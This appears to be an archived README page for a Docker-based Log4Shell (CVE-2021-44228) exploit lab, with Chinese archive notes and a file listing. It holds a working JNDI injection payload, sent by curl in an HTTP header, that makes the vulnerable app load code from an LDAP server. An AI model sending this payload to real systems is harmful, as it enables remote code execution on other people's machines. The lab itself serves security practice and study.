关联漏洞
描述
CVE-2021-44228
介绍
# log4shell exploit lab
This repository is a single-line setup for log4shell exploit lab.
Setup the lab: `docker-compose up -d`
Run exploit: `curl -X GET http://localhost:8080/ -H "X-Api-Version: ${jndi:ldap://my_ldap_server:1389/a}"`
Then go to `vul` container and see that indeed we pwned the machine:

* Video explaining the lab setup: https://www.youtube.com/watch?v=WBzR30JcT5g)
* Video explaining the code: https://www.youtube.com/watch?v=oRvp0c-fa1o
文件快照
[4.0K] /data/pocs/4571729616a09024fc6c5d1efc1c14c0899f2958
├── [4.0K] CVE-2021-44228
├── [ 681] docker-compose.yml
├── [4.0K] log4shell_javaagent_monitor
├── [4.0K] log4shell-vulnerable-app
├── [ 523] README.md
└── [4.0K] README-resources
└── [ 53K] Screenshot 2023-11-30 205423.png
4 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。